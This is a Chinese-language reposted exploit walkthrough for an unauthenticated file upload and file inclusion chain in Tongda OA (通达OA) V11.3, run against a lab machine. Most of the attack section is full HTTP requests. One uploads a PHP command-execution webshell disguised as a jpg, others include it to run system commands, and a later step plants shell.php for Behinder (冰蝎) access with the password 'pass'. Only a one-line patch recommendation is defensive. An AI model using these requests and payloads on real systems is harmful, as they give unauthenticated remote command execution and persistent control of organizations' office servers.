首页 > 运维 > 安全 > 通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

WBOY
发布: 2023-06-02 20:55:22
转载
3654 人浏览过

一、漏洞介绍

通达OA介绍:

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,北京通达信科科技有限公司是一支以协同管理软件研发与实施、服务与咨询为主营业务的高科技团队,是国内协同管理软件行业里唯一一家央企单位,中国协同管理软件的领军企业。

通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。该系统采用领先的B/S(浏览器/服务器)操作方式,使得网络办公不受地域限。通达Office Anywhere采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。

漏洞影响的版本有:

V11版、2017版、2016版、2015版、2013增强版、2013版。

备注:

无需登录,前台即可实现漏洞利用

2013版:

文件上传漏洞路径:/ispirit/im/upload.php

文件包含漏洞路径:/ispirit/interface/gateway.php

2017版:

文件上传漏洞路径:/ispirit/im/upload.php

文件包含漏洞路径:/mac/gateway.php

漏洞环境:

靶机(Windows server 2008 R2)IP:172.16.0.45

通达OA:V 11.3版本

二、环境搭建

(1)下载通达OA V11.3版本以后,点击运行TDOA11.3的应用程序运行文件

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(2)确保80端口不被占用的情况下,将应用搭建在80端口,然后点击下一步

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(3)配置完成

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(4)查看搭建的结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(5)账户为admin,密码为空,登陆到后端系统

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

三、漏洞复现

3.1 任意命令执行

(2)存在无需登录即可上传任意文件的前台漏洞,攻击者可以通过抓取数据包、修改并重放数据包的方式,上传后缀为jpg的木马文件来攻击系统

POST /ispirit/im/upload.php HTTP/1.1Host: 172.16.0.45Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh2YB4pV8McGBAccept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5Cookie: PHPSESSID=123Connection: closeContent-Length: 660------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="UPLOAD_MODE"2------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="P"123------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="DEST_UID"1------WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name="ATTACHMENT"; filename="jpg"Content-Type: image/jpeg<?php$command=$_POST[&#39;cmd&#39;];$wsh = new COM(&#39;WScript.shell&#39;);$exec = $wsh->exec("cmd /c ".$command);$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>------WebKitFormBoundarypyfBh2YB4pV8McGB--
登录后复制

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(2)查看运行结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(3)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令

此处执行命令“net user”

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 71json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=net user
登录后复制

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,即可实现执行任意命令

此处执行命令“ipconfig”

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=ipconfig
登录后复制

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

3.2 getshell

(1)前台任意文件上传漏洞:抓取任意数据包,修改数据包进行重放,上传后缀为jpg的木马文件(木马文件执行写入文件操作)

POST /ispirit/im/upload.php HTTP/1.1
登录后复制

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(2)查看运行结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析(3)查看/webroot/ispirit/interface/目录下的文件信息

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析(4)前台文件包含漏洞:修改数据包,包含前面上传的jpg木马文件,会在文件包含的根目录下生成一个 shell.php 文件

POST /ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json={"url":"/general/../../attach/im/2012/213131861.jpg"}&cmd=ipconfig
登录后复制

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(5)查看文件包含漏洞的执行结果

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

(6)使用冰蝎进行连接:http://172.16.0.45/ispirit/interface/shell.php

密码为:pass

PS:此处用蚁剑和菜刀无法进行连接

通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析

四、加固建议

我们建议通达OA用户使用受影响版本登录通达OA官网,并获取最新的补丁。请根据当前OA版本选择所对应的程序文件,运行前请先做好备份。

以上是通达OA前台任意文件上传漏洞及文件包含漏洞导致getshell的示例分析的详细内容。更多信息请关注PHP中文网其他相关文章!

相关标签:
来源:yisu.com
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板